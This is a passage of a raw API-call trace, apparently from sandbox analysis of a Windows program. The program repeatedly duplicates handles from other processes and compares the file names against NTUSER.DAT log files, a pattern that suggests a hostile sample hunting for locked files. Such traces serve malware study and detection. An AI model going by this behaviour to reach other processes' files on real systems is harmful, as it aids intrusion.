(dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.011] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.011] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.014] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.015] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.015] CloseHandle (hObject=0x670) returned 1 [0153.015] _wcsicmp (_Str1="\\netshell.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -15 [0153.015] CloseHandle (hObject=0x680) returned 1 [0153.015] CloseHandle (hObject=0x62c) returned 1 [0153.015] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.015] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x8ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.015] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.016] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.017] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.017] CloseHandle (hObject=0x670) returned 1 [0153.018] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.018] CloseHandle (hObject=0x680) returned 1 [0153.018] CloseHandle (hObject=0x62c) returned 1 [0153.018] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.018] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x950, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.018] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.019] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.020] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.020] CloseHandle (hObject=0x670) returned 1 [0153.020] CloseHandle (hObject=0x680) returned 1 [0153.020] CloseHandle (hObject=0x62c) returned 1 [0153.020] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.020] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x984, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.021] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.022] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.022] CloseHandle (hObject=0x670) returned 1 [0153.022] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0153.022] CloseHandle (hObject=0x680) returned 1 [0153.022] CloseHandle (hObject=0x62c) returned 1 [0153.022] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.022] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x9f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.023] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.024] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.024] CloseHandle (hObject=0x670) returned 1 [0153.024] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.024] CloseHandle (hObject=0x680) returned 1 [0153.025] CloseHandle (hObject=0x62c) returned 1 [0153.025] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.025] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.026] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.026] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.027] CloseHandle (hObject=0x670) returned 1 [0153.027] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.027] CloseHandle (hObject=0x680) returned 1 [0153.027] CloseHandle (hObject=0x62c) returned 1 [0153.027] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.027] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa34, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.027] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.028] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.029] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.029] CloseHandle (hObject=0x670) returned 1 [0153.029] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.029] CloseHandle (hObject=0x680) returned 1 [0153.029] CloseHandle (hObject=0x62c) returned 1 [0153.029] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.029] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.029] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.030] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.031] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.031] CloseHandle (hObject=0x670) returned 1 [0153.031] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.031] CloseHandle (hObject=0x680) returned 1 [0153.031] CloseHandle (hObject=0x62c) returned 1 [0153.031] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.031] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.031] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.032] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.033] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.033] CloseHandle (hObject=0x670) returned 1 [0153.033] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.033] CloseHandle (hObject=0x680) returned 1 [0153.033] CloseHandle (hObject=0x62c) returned 1 [0153.033] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.033] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xae4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.035] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.035] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.036] CloseHandle (hObject=0x670) returned 1 [0153.036] _wcsicmp (_Str1="\\FXSAPIDebugLogFile.txt", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -8 [0153.036] CloseHandle (hObject=0x680) returned 1 [0153.036] CloseHandle (hObject=0x62c) returned 1 [0153.036] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.036] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xaf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.037] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.038] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.038] CloseHandle (hObject=0x670) returned 1 [0153.038] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.038] CloseHandle (hObject=0x680) returned 1 [0153.038] CloseHandle (hObject=0x62c) returned 1 [0153.038] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.038] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xccc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.039] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.040] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.040] CloseHandle (hObject=0x670) returned 1 [0153.040] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0153.040] CloseHandle (hObject=0x680) returned 1 [0153.041] CloseHandle (hObject=0x62c) returned 1 [0153.041] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.041] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.041] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.042] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.042] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.043] CloseHandle (hObject=0x670) returned 1 [0153.043] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0153.043] CloseHandle (hObject=0x680) returned 1 [0153.043] CloseHandle (hObject=0x62c) returned 1 [0153.043] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.043] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.043] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.044] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.044] CloseHandle (hObject=0x670) returned 1 [0153.044] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0153.044] CloseHandle (hObject=0x680) returned 1 [0153.044] CloseHandle (hObject=0x62c) returned 1 [0153.044] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.044] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd44, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.045] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.046] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.046] CloseHandle (hObject=0x670) returned 1 [0153.046] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0153.046] CloseHandle (hObject=0x680) returned 1 [0153.046] CloseHandle (hObject=0x62c) returned 1 [0153.046] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.047] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd54, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.047] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.048] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.048] CloseHandle (hObject=0x670) returned 1 [0153.048] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0153.048] CloseHandle (hObject=0x680) returned 1 [0153.048] CloseHandle (hObject=0x62c) returned 1 [0153.048] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.049] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.050] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.051] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.051] CloseHandle (hObject=0x670) returned 1 [0153.051] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0153.051] CloseHandle (hObject=0x680) returned 1 [0153.051] CloseHandle (hObject=0x62c) returned 1 [0153.051] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.051] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.051] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.052] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.053] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.053] CloseHandle (hObject=0x670) returned 1 [0153.053] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0153.053] CloseHandle (hObject=0x680) returned 1 [0153.053] CloseHandle (hObject=0x62c) returned 1 [0153.053] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.053] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.055] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.055] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.055] CloseHandle (hObject=0x670) returned 1 [0153.056] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0153.056] CloseHandle (hObject=0x680) returned 1 [0153.056] CloseHandle (hObject=0x62c) returned 1 [0153.056] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.056] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.056] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.057] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.057] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.058] CloseHandle (hObject=0x670) returned 1 [0153.058] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0153.058] CloseHandle (hObject=0x680) returned 1 [0153.058] CloseHandle (hObject=0x62c) returned 1 [0153.058] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.058] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1294, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.059] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.060] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.060] CloseHandle (hObject=0x670) returned 1 [0153.060] _wcsicmp (_Str1="\\ActionCenter.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.060] CloseHandle (hObject=0x680) returned 1 [0153.060] CloseHandle (hObject=0x62c) returned 1 [0153.060] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.060] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.061] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.062] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.062] CloseHandle (hObject=0x670) returned 1 [0153.062] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.062] CloseHandle (hObject=0x680) returned 1 [0153.062] CloseHandle (hObject=0x62c) returned 1 [0153.062] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.062] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1308, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.063] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.064] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.064] CloseHandle (hObject=0x670) returned 1 [0153.064] CloseHandle (hObject=0x680) returned 1 [0153.064] CloseHandle (hObject=0x62c) returned 1 [0153.064] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.064] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.065] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.065] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.066] CloseHandle (hObject=0x670) returned 1 [0153.066] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.066] CloseHandle (hObject=0x680) returned 1 [0153.066] CloseHandle (hObject=0x62c) returned 1 [0153.066] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.066] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.067] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.067] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.067] CloseHandle (hObject=0x670) returned 1 [0153.067] CloseHandle (hObject=0x680) returned 1 [0153.067] CloseHandle (hObject=0x62c) returned 1 [0153.067] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.068] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, 